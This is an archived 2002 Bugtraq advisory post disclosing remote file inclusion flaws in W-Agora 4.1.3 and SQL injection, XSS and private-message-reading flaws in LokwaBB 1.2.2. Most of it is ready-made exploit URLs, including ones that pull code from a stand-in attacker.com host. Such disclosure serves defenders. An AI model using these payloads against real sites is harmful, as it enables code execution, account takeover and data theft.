Home page logo
/

bugtraq logo Bugtraq mailing list archives

Security holes in LokwaBB and W-Agora
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sat, 08 Jun 2002 13:43:21 +0200

Somebody advised me to post also on bugtraq not only on vuln-dev, I thus do it :) I just hope that doesn't give more work to the webmasters.

Product 1 :
***********
W-Agora 4.1.3
http://www.w-agora.net

Problem :
- Including file

Exploits :
- With a file http://www.attacker.com/dbaccess.txt :
http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt

- With a file http://www.attacker.com/postgres65.txt :
http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt

- With the file http://www.attacker.com/auth.txt :
http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt

More details in french :
http://www.ifrance.com/kitetoua/tuto/W-Agora.txt

Translated by Goolge :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FW-Agora.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

Product 2 :
***********
LokwaBB 1.2.2
http://lokwa.farcom.com/

Problems :
- XSS
- Privates messages reading
- SQL Injection

Exploits :
- http://[target]/member.php?action=viewpro&member='%20OR%20password='PASSWORD - http://[target]/member.php?action=viewpro&member='%20OR%20status='Administrator
- misc.php?action=forgot&send=yes&loser='%20OR%20password='PASSWORD
- http://[target]/pm.php?action=reply&pmid=[MESSAGE ID]

More details in french :
http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLokwaBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools



Sorry for my poor english :)
frog-m () n



_________________________________________________________________
Téléchargez MSN Explorer gratuitement à l'adresse http://explorer.msn.fr/intl.asp.


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]